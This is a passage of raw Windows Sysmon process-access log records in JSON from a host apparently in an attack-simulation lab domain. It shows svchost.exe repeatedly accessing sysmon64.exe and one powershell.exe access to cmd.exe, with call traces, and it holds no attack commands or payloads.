07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1F3FFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b42a7|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b452d|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3ed3|UNKNOWN(00007FFD15631623)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 